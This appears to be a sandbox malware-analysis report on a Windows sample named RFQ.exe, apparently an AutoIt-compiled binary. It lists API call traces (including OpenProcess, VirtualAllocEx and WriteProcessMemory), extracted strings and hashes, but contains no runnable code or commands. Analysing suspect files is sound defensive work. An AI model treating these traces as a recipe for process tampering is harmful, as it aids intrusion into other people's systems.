  • Part of subcall function 006B37B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,0069FD75,?,?,0068B63D,00000000,?,?,?,006F106C,0071D0D0,?,006C242E), ref: 006B37E2
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 006BCDAF
• _free.LIBCMT ref: 006BCDC2
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006BCDD1
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0069AB19
• SelectObject.GDI32(?,00000000), ref: 0069AB28
• BeginPath.GDI32(?), ref: 0069AB3F
• SelectObject.GDI32(?,00000000), ref: 0069AB68
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
APIs
• GetLastError.KERNEL32(?,?,?,006AF26E,006B37F3,00000001,?,0069FD75,?,?,0068B63D,00000000,?,?,?,006F106C), ref: 006B2D8D
• _free.LIBCMT ref: 006B2DC2
• _free.LIBCMT ref: 006B2DE9
• SetLastError.KERNEL32(00000000), ref: 006B2DF6
• SetLastError.KERNEL32(00000000), ref: 006B2DFF
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
APIs
• QueryPerformanceCounter.KERNEL32(?), ref: 006EE8B5
• QueryPerformanceFrequency.KERNEL32(?), ref: 006EE8C3
• Sleep.KERNEL32(00000000), ref: 006EE8CB
• QueryPerformanceCounter.KERNEL32(?), ref: 006EE8D5
• Sleep.KERNEL32 ref: 006EE911
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006E1058
• GetLastError.KERNEL32(?,00000000,00000000,?,?,006E0ADF,?,?,?), ref: 006E1064
• GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,006E0ADF,?,?,?), ref: 006E1073
• HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,006E0ADF,?,?,?), ref: 006E107A
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006E1091
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006E0F0E
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006E0F1A
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006E0F29
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006E0F30
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006E0F46
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006E0F6E
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006E0F7A
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E0F89
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006E0F90
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E0FA6
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
APIs
• CloseHandle.KERNEL32(?,?,?,?,006F009B,?,006F321A,?,00000001,006C311E,?), ref: 006F0242
• CloseHandle.KERNEL32(?,?,?,?,006F009B,?,006F321A,?,00000001,006C311E,?), ref: 006F024F
• CloseHandle.KERNEL32(?,?,?,?,006F009B,?,006F321A,?,00000001,006C311E,?), ref: 006F025C
• CloseHandle.KERNEL32(?,?,?,?,006F009B,?,006F321A,?,00000001,006C311E,?), ref: 006F0269
• CloseHandle.KERNEL32(?,?,?,?,006F009B,?,006F321A,?,00000001,006C311E,?), ref: 006F0276
• CloseHandle.KERNEL32(?,?,?,?,006F009B,?,006F321A,?,00000001,006C311E,?), ref: 006F0283
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
• _free.LIBCMT ref: 006BD6F2
  • Part of subcall function 006B2958: RtlFreeHeap.NTDLL(00000000,00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000), ref: 006B296E
  • Part of subcall function 006B2958: GetLastError.KERNEL32(00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000,00000000), ref: 006B2980
• _free.LIBCMT ref: 006BD704
• _free.LIBCMT ref: 006BD716
• _free.LIBCMT ref: 006BD728
• _free.LIBCMT ref: 006BD73A
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• GetDlgItem.USER32(?,000003E9), ref: 006E5BAE
• GetWindowTextW.USER32(00000000,?,00000100), ref: 006E5BC5
• MessageBeep.USER32(00000000), ref: 006E5BDD
• KillTimer.USER32(?,0000040A), ref: 006E5BF9
• EndDialog.USER32(?,00000001), ref: 006E5C13
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
                                                                            APIs
                                                                            • _free.LIBCMT ref: 006B224E
                                                                              • Part of subcall function 006B2958: RtlFreeHeap.NTDLL(00000000,00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000), ref: 006B296E
                                                                              • Part of subcall function 006B2958: GetLastError.KERNEL32(00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000,00000000), ref: 006B2980
                                                                            • _free.LIBCMT ref: 006B2260
                                                                            • _free.LIBCMT ref: 006B2273
                                                                            • _free.LIBCMT ref: 006B2284
                                                                            • _free.LIBCMT ref: 006B2295
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            APIs
                                                                            • EndPath.GDI32(?), ref: 0069AA5A
                                                                            • StrokeAndFillPath.GDI32(?,?,006D7BB4,00000000,?,?,?), ref: 0069AA76
                                                                            • SelectObject.GDI32(?,00000000), ref: 0069AA89
                                                                            • DeleteObject.GDI32 ref: 0069AA9C
                                                                            • StrokePath.GDI32(?), ref: 0069AAB7
                                                                            Similarity
                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                            • String ID:
                                                                            • API String ID: 2625713937-0
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: __freea$_free
                                                                            • String ID: a/p$am/pm
                                                                            • API String ID: 3432400110-3206640213
                                                                            APIs
                                                                              • Part of subcall function 006A01C2: EnterCriticalSection.KERNEL32(0075070C,?,?,?,00691744,00752580,?,?,?), ref: 006A01CD
                                                                              • Part of subcall function 006A01C2: LeaveCriticalSection.KERNEL32(0075070C,?,00691744,00752580,?,?,?), ref: 006A020A
                                                                              • Part of subcall function 006A0023: __onexit.LIBCMT ref: 006A0029
                                                                            • __Init_thread_footer.LIBCMT ref: 0070615F
                                                                              • Part of subcall function 006A0178: EnterCriticalSection.KERNEL32(0075070C,?,?,006D556E,00752540,?,?,?,?,?), ref: 006A0182
                                                                              • Part of subcall function 006A0178: LeaveCriticalSection.KERNEL32(0075070C,?,006D556E,00752540,?,?,?,?,?), ref: 006A01B5
                                                                              • Part of subcall function 006F34BA: LoadStringW.USER32(00000066,?,00000FFF,?), ref: 006F3502
                                                                              • Part of subcall function 006F34BA: LoadStringW.USER32(?,?,00000FFF,?), ref: 006F3528
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                            • String ID: x#u$x#u$x#u
                                                                            • API String ID: 1072379062-3372033415
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?), ref: 0070963F
                                                                            • CharLowerBuffW.USER32(?,?), ref: 00709682
                                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040,00000000,?,?), ref: 00709895
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: BuffCharLower$AllocVirtual
                                                                            • String ID: un
                                                                            • API String ID: 3213863441-4255045500
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _wcslen
                                                                            • String ID: 3$A$_
                                                                            • API String ID: 176396367-1956071190
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                              • Part of subcall function 006DF934: VariantClear.OLEAUT32(?), ref: 006DF950
                                                                              • Part of subcall function 006DF934: VariantCopy.OLEAUT32(?,00000000), ref: 006DF958
                                                                              • Part of subcall function 006DF934: VariantClear.OLEAUT32(?), ref: 006DF963
                                                                            • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 007048E3
                                                                            • VariantInit.OLEAUT32(?), ref: 007049D8
                                                                            • VariantClear.OLEAUT32(?), ref: 00704A97
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Variant$Clear$CopyErrorInitLast_wcslen
                                                                            • String ID: Qdn
                                                                            • API String ID: 3379188476-967081833
                                                                            APIs
                                                                            • __Init_thread_footer.LIBCMT ref: 0068D7B3
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Init_thread_footer
                                                                            • String ID: D%u$D%u$D%u
                                                                            • API String ID: 1385522511-622992210
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(ybm,00000000,?,0071D0D0,?,00000000,00000000), ref: 00707804
                                                                              • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
                                                                            • CharUpperBuffW.USER32(ybm,00000000,?,0071D0D0,00000000,?,00000000,00000000), ref: 00707762
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: BuffCharUpper$_wcslen
                                                                            • String ID: Lst$ybm
                                                                            • API String ID: 3544283678-2409334373
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: BuffCharUpper_wcslen
                                                                            • String ID: CALLARGARRAY$Qdn
                                                                            • API String ID: 157775604-1360434663
                                                                            APIs
                                                                              • Part of subcall function 006EB321: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006E2114,?,?,00000034,00000800,?,00000034), ref: 006EB34B
                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 006E26A4
                                                                              • Part of subcall function 006EB2EC: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006E2143,?,?,00000800,?,00001073,00000000,?,?), ref: 006EB316
                                                                              • Part of subcall function 006EB248: GetWindowThreadProcessId.USER32(?,?), ref: 006EB273
                                                                              • Part of subcall function 006EB248: OpenProcess.KERNEL32(00000438,00000000,?,?,?,006E20D8,00000034,?,?,00001004,00000000,00000000), ref: 006EB283
                                                                              • Part of subcall function 006EB248: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,006E20D8,00000034,?,?,00001004,00000000,00000000), ref: 006EB299
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006E2711
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006E275E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                            • String ID: @
                                                                            • API String ID: 4150878124-2766056989
                                                                            • Opcode ID: 91ad7a0a84b02429a5f59cf53350fa501c72ca12bf8d952331a0c7e26530a59b
                                                                            • Instruction ID: fc3b74797c97c6476353bea5343ba91dc56b6405b946362e793b4bb6f26df8dd
                                                                            • Opcode Fuzzy Hash: 91ad7a0a84b02429a5f59cf53350fa501c72ca12bf8d952331a0c7e26530a59b
                                                                            • Instruction Fuzzy Hash: 3E413C72901219AFDF11DFA5CD85AEEBBB9EF09700F004099FA45B7281DA706E45CB64
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ.exe,00000104), ref: 006B16F9
                                                                            • _free.LIBCMT ref: 006B17C4
                                                                            • _free.LIBCMT ref: 006B17CE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _free$FileModuleName
                                                                            • String ID: C:\Users\user\Desktop\RFQ.exe
                                                                            • API String ID: 2506810119-1200040333
                                                                            • Opcode ID: 1da28ce76e0b3a44472481b0a38710180f289971d6ea8cabadcd7dcb121bf8c1
                                                                            • Instruction ID: a58f909259d0a195faa3a45d7fb71083f2cc19ae0ae3c6e4065dfff8e48e0175
                                                                            • Opcode Fuzzy Hash: 1da28ce76e0b3a44472481b0a38710180f289971d6ea8cabadcd7dcb121bf8c1
                                                                            • Instruction Fuzzy Hash: 4F3193B1A40218BBCB21DB99CC95DDEBBFDEB86311F50416AE404DB210DAB08E81CB94
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 006EC224
                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 006EC26A
                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00751990,01355870), ref: 006EC2B3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$InfoItem
                                                                            • String ID: 0
                                                                            • API String ID: 135850232-4108050209
                                                                            • Opcode ID: dbb4d091c247ce32fdf601d69935af1ff892962de5bdfe8fd4965af55068b038
                                                                            • Instruction ID: cf4720e9c4063d98b1301c8717268f4ffcf3ef5ab9a7904b3da2ef88d7be3875
                                                                            • Opcode Fuzzy Hash: dbb4d091c247ce32fdf601d69935af1ff892962de5bdfe8fd4965af55068b038
                                                                            • Instruction Fuzzy Hash: 7D41E330105381DFD720DF65C840B9ABBEAAF89324F14451DF961973D1C730EA06CB6A
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0071D0D0,00000000,?,?,?,?), ref: 007143DF
                                                                            • GetWindowLongW.USER32 ref: 007143FC
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0071440C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long
                                                                            • String ID: SysTreeView32
                                                                            • API String ID: 847901565-1698111956
                                                                            • Opcode ID: a412d95a7bbf291d60d59997244846d81d68c16202ba0be1c55e73806a15d065
                                                                            • Instruction ID: 9894d43c8016b66a1ec94875f73852a944d3de5f32e05c66dc4b42407ff2f4a0
                                                                            • Opcode Fuzzy Hash: a412d95a7bbf291d60d59997244846d81d68c16202ba0be1c55e73806a15d065
                                                                            • Instruction Fuzzy Hash: C131B072100205ABDF219F78CC45BEA7BA9EB09334F248724F979E21E1C738EC958B54
                                                                            APIs
                                                                              • Part of subcall function 00703282: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00702F9E,?,?), ref: 0070329F
                                                                            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00702FA1
                                                                            • _wcslen.LIBCMT ref: 00702FC2
                                                                            • htons.WSOCK32(00000000,?,?,00000000), ref: 0070302D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                            • String ID: 255.255.255.255
                                                                            • API String ID: 946324512-2422070025
                                                                            • Opcode ID: 4949145e3b181183a4476e27091fa54548bc9afaa5149eaf31f789a4f93d8ed9
                                                                            • Instruction ID: 21b21397c23487c194719f0320e823459f29ae9e968fd7800bc33a1f5637734b
                                                                            • Opcode Fuzzy Hash: 4949145e3b181183a4476e27091fa54548bc9afaa5149eaf31f789a4f93d8ed9
                                                                            • Instruction Fuzzy Hash: 0131C135601201DFCB20DF68C585E6A7BE6AF15358F248299E8168F3D2D779EE42CB60
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0071463A
                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00714648
                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0071464F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyWindow
                                                                            • String ID: msctls_updown32
                                                                            • API String ID: 4014797782-2298589950
                                                                            • Opcode ID: 3d1c99fc14a4229bad4acfe8ec4265182a4ef75ce8514ed98d7abc177d7f0bdb
                                                                            • Instruction ID: 5575fe64d58eef3f45cf7e9118f77484c507cd74de88e79cb54ff03452ef1bd6
                                                                            • Opcode Fuzzy Hash: 3d1c99fc14a4229bad4acfe8ec4265182a4ef75ce8514ed98d7abc177d7f0bdb
                                                                            • Instruction Fuzzy Hash: B121AFB5600208AFDB10DF68CC91DF737ADEF4A3A8B040049FA009B291CB75EC51CB60
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen
                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                            • API String ID: 176396367-2734436370
                                                                            • Opcode ID: aa8a6fa00b85f5be5bacb413464e77dbcf53b601f7880ecb19da2ea4e1fd8710
                                                                            • Instruction ID: d0651b675e3b161a2a1712e90472899169dab9a19016f698624dcd1fc629bf43
                                                                            • Opcode Fuzzy Hash: aa8a6fa00b85f5be5bacb413464e77dbcf53b601f7880ecb19da2ea4e1fd8710
                                                                            • Instruction Fuzzy Hash: 4E212972106391A6C732F6269C12FEB73DB9F92310F548029F9458B5C1EB65AD82C3B9
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00713773
                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00713783
                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007137A9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$MoveWindow
                                                                            • String ID: Listbox
                                                                            • API String ID: 3315199576-2633736733
                                                                            • Opcode ID: 0e5329ad3b081b94e0d7fea12aecbb61b2d723ac1b73e1e056c18ba1adec2171
                                                                            • Instruction ID: 1f6cc8b2ca0faba963197e16a65a7a7847c7d9799bb395dc3b3936d59061a997
                                                                            • Opcode Fuzzy Hash: 0e5329ad3b081b94e0d7fea12aecbb61b2d723ac1b73e1e056c18ba1adec2171
                                                                            • Instruction Fuzzy Hash: C421A4B2610218BBEF118F68DC85EFB376EEF89760F108114F9549B1D0C679ED9187A0
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 006F4926
                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 006F497A
                                                                            • SetErrorMode.KERNEL32(00000000,?,?,0071D0D0), ref: 006F49EE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume
                                                                            • String ID: %lu
                                                                            • API String ID: 2507767853-685833217
                                                                            • Opcode ID: 267fb0f9a1fa5c8a5bb2927372674f244da94dcddc44ddf793d8545d1119ab26
                                                                            • Instruction ID: 783941ccffa0e793bf1e58136995ffd63b1e5f99089d025acc587c62f34517bf
                                                                            • Opcode Fuzzy Hash: 267fb0f9a1fa5c8a5bb2927372674f244da94dcddc44ddf793d8545d1119ab26
                                                                            • Instruction Fuzzy Hash: 72316F74A00109AFDB50DF94C885EAA7BF9EF08308F148099F909DB392DB75EE45CB61
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00714184
                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00714199
                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007141A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: msctls_trackbar32
                                                                            • API String ID: 3850602802-1010561917
                                                                            • Opcode ID: 68d6c3a98a91addfb5065938af92463002f7c09bff05bde5f9f643a92b33e978
                                                                            • Instruction ID: bc655a3eb2036ec2484f7a7d75f5b3a17052daa30af2090e205d01e17c471018
                                                                            • Opcode Fuzzy Hash: 68d6c3a98a91addfb5065938af92463002f7c09bff05bde5f9f643a92b33e978
                                                                            • Instruction Fuzzy Hash: EB11027124020CBEEF205F68CC06FEB3BA8EF95B24F114514FA55E20E0D675EC91AB60
                                                                            APIs
                                                                              • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
                                                                              • Part of subcall function 006E2CEB: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 006E2D09
                                                                              • Part of subcall function 006E2CEB: GetWindowThreadProcessId.USER32(?,00000000), ref: 006E2D1A
                                                                              • Part of subcall function 006E2CEB: GetCurrentThreadId.KERNEL32 ref: 006E2D21
                                                                              • Part of subcall function 006E2CEB: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 006E2D28
                                                                            • GetFocus.USER32 ref: 006E2EBB
                                                                              • Part of subcall function 006E2D32: GetParent.USER32(00000000), ref: 006E2D3D
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 006E2F06
                                                                            • EnumChildWindows.USER32(?,006E2F7E), ref: 006E2F2E
                                                                            Strings
                                                                            Memory Dump Source
